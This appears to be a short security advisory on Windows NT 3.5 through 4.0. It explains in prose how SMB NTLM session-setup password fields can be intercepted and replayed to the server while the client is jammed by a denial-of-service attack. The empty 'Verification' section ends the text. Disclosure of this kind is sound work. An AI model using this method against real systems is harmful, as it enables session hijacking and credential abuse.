NT Versions Affected:
3.5, 3.51, 4.0
Problem:
NTs' dialect of LanManager (SMB NTLM 0.12) can be intercepted during the session_setup_andx phase.
The CaseSensitivePassword and CaseInsensitivePassword fields can be copied from the intercepted session_setup_andx message from the client, and sent to the server. The client can be jammed with a Denial-of-Service attack, and by sending the forged session_setup_andx messages to the server, a session with the clients' credentials can be established.
Verification: